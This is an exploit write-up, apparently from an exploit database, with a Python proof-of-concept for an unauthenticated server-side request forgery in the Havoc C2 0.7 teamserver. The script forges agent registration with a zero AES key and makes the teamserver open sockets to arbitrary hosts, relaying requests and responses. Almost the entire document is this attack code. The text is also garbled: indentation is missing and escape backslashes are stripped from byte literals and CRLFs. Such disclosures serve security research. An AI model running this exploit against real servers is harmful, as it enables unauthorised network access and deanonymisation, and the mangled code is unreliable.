Authored by chebuya

Havoc C2 version 0.7 suffers from an unauthenticated server-side request forgery vulnerability.

# Exploit Title: Havoc C2 0.7 Unauthenticated SSRF
# Date: 2024-07-13
# Exploit Author: @_chebuya
# Software Link: https://github.com/HavocFramework/Havoc
# Version: v0.7
# Tested on: Ubuntu 20.04 LTS
# CVE: ?
# Description: This exploit works by spoofing a demon agent registration and checkins to open a TCP socket on the teamserver and read/write data from it. This allows attackers to leak origin IPs of teamservers and much more.
# Github: https://github.com/chebuya/Havoc-C2-SSRF-poc
# Blog: https://blog.chebuya.com/posts/server-side-request-forgery-on-havoc-c2/
import binascii
import random
import requests
import argparse
import urllib3
urllib3.disable_warnings()


from Crypto.Cipher import AES
from Crypto.Util import Counter

key_bytes = 32

def decrypt(key, iv, ciphertext):
if len(key) <= key_bytes:
for _ in range(len(key), key_bytes):
key += b"0"

assert len(key) == key_bytes

iv_int = int(binascii.hexlify(iv), 16)
ctr = Counter.new(AES.block_size * 8, initial_value=iv_int)
aes = AES.new(key, AES.MODE_CTR, counter=ctr)

plaintext = aes.decrypt(ciphertext)
return plaintext


def int_to_bytes(value, length=4, byteorder="big"):
return value.to_bytes(length, byteorder)


def encrypt(key, iv, plaintext):

if len(key) <= key_bytes:
for x in range(len(key),key_bytes):
key = key + b"0"

assert len(key) == key_bytes

iv_int = int(binascii.hexlify(iv), 16)
ctr = Counter.new(AES.block_size * 8, initial_value=iv_int)
aes = AES.new(key, AES.MODE_CTR, counter=ctr)

ciphertext = aes.encrypt(plaintext)
return ciphertext

def register_agent(hostname, username, domain_name, internal_ip, process_name, process_id):
# DEMON_INITIALIZE / 99
command = b"x00x00x00x63"
request_id = b"x00x00x00x01"
demon_id = agent_id

hostname_length = int_to_bytes(len(hostname))
username_length = int_to_bytes(len(username))
domain_name_length = int_to_bytes(len(domain_name))
internal_ip_length = int_to_bytes(len(internal_ip))
process_name_length = int_to_bytes(len(process_name) - 6)

data = b"xab" * 100

header_data = command + request_id + AES_Key + AES_IV + demon_id + hostname_length + hostname + username_length + username + domain_name_length + domain_name + internal_ip_length + internal_ip + process_name_length + process_name + process_id + data

size = 12 + len(header_data)
size_bytes = size.to_bytes(4, 'big')
agent_header = size_bytes + magic + agent_id

print("[***] Trying to register agent...")
r = requests.post(teamserver_listener_url, data=agent_header + header_data, headers=headers, verify=False)
if r.status_code == 200:
print("[***] Success!")
else:
print(f"[!!!] Failed to register agent - {r.status_code} {r.text}")


def open_socket(socket_id, target_address, target_port):
# COMMAND_SOCKET / 2540
command = b"x00x00x09xec"
request_id = b"x00x00x00x02"

# SOCKET_COMMAND_OPEN / 16
subcommand = b"x00x00x00x10"
sub_request_id = b"x00x00x00x03"

local_addr = b"x22x22x22x22"
local_port = b"x33x33x33x33"


forward_addr = b""
for octet in target_address.split(".")[::-1]:
forward_addr += int_to_bytes(int(octet), length=1)

forward_port = int_to_bytes(target_port)

package = subcommand+socket_id+local_addr+local_port+forward_addr+forward_port
package_size = int_to_bytes(len(package) + 4)

header_data = command + request_id + encrypt(AES_Key, AES_IV, package_size + package)

size = 12 + len(header_data)
size_bytes = size.to_bytes(4, 'big')
agent_header = size_bytes + magic + agent_id
data = agent_header + header_data


print("[***] Trying to open socket on the teamserver...")
r = requests.post(teamserver_listener_url, data=data, headers=headers, verify=False)
if r.status_code == 200:
print("[***] Success!")
else:
print(f"[!!!] Failed to open socket on teamserver - {r.status_code} {r.text}")


def write_socket(socket_id, data):
# COMMAND_SOCKET / 2540
command = b"x00x00x09xec"
request_id = b"x00x00x00x08"

# SOCKET_COMMAND_READ / 11
subcommand = b"x00x00x00x11"
sub_request_id = b"x00x00x00xa1"

# SOCKET_TYPE_CLIENT / 3
socket_type = b"x00x00x00x03"
success = b"x00x00x00x01"

data_length = int_to_bytes(len(data))

package = subcommand+socket_id+socket_type+success+data_length+data
package_size = int_to_bytes(len(package) + 4)

header_data = command + request_id + encrypt(AES_Key, AES_IV, package_size + package)

size = 12 + len(header_data)
size_bytes = size.to_bytes(4, 'big')
agent_header = size_bytes + magic + agent_id
post_data = agent_header + header_data

print("[***] Trying to write to the socket")
r = requests.post(teamserver_listener_url, data=post_data, headers=headers, verify=False)
if r.status_code == 200:
print("[***] Success!")
else:
print(f"[!!!] Failed to write data to the socket - {r.status_code} {r.text}")


def read_socket(socket_id):
# COMMAND_GET_JOB / 1
command = b"x00x00x00x01"
request_id = b"x00x00x00x09"

header_data = command + request_id

size = 12 + len(header_data)
size_bytes = size.to_bytes(4, 'big')
agent_header = size_bytes + magic + agent_id
data = agent_header + header_data


print("[***] Trying to poll teamserver for socket output...")
r = requests.post(teamserver_listener_url, data=data, headers=headers, verify=False)
if r.status_code == 200:
print("[***] Read socket output successfully!")
else:
print(f"[!!!] Failed to read socket output - {r.status_code} {r.text}")
return ""


command_id = int.from_bytes(r.content[0:4], "little")
request_id = int.from_bytes(r.content[4:8], "little")
package_size = int.from_bytes(r.content[8:12], "little")
enc_package = r.content[12:]

return decrypt(AES_Key, AES_IV, enc_package)[12:]



parser = argparse.ArgumentParser()
parser.add_argument("-t", "--target", help="The listener target in URL format", required=True)
parser.add_argument("-i", "--ip", help="The IP to open the socket with", required=True)
parser.add_argument("-p", "--port", help="The port to open the socket with", required=True)
parser.add_argument("-A", "--user-agent", help="The URL for a havoc listener", default="Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36")
parser.add_argument("-H", "--hostname", help="The hostname for the spoofed agent", default="DESKTOP-7F61JT1")
parser.add_argument("-u", "--username", help="The username for the spoofed agent", default="Administrator")
parser.add_argument("-d", "--domain-name", help="The domain name for the spoofed agent", default="ECORP")
parser.add_argument("-n", "--process-name", help="The process name for the spoofed agent", default="msedge.exe")
parser.add_argument("-ip", "--internal-ip", help="The internal ip for the spoofed agent", default="10.1.33.7")

args = parser.parse_args()


# 0xDEADBEEF
magic = b"xdexadxbexef"
teamserver_listener_url = args.target
headers = {
"User-Agent": args.user_agent
}
agent_id = int_to_bytes(random.randint(100000, 1000000))
AES_Key = b"x00" * 32
AES_IV = b"x00" * 16
hostname = bytes(args.hostname, encoding="utf-8")
username = bytes(args.username, encoding="utf-8")
domain_name = bytes(args.domain_name, encoding="utf-8")
internal_ip = bytes(args.internal_ip, encoding="utf-8")
process_name = args.process_name.encode("utf-16le")
process_id = int_to_bytes(random.randint(1000, 5000))

register_agent(hostname, username, domain_name, internal_ip, process_name, process_id)

socket_id = b"x11x11x11x11"
open_socket(socket_id, args.ip, int(args.port))

request_data = b"GET /vulnerable HTTP/1.1rnHost: www.example.comrnConnection: closernrn"
write_socket(socket_id, request_data)
print(read_socket(socket_id).decode())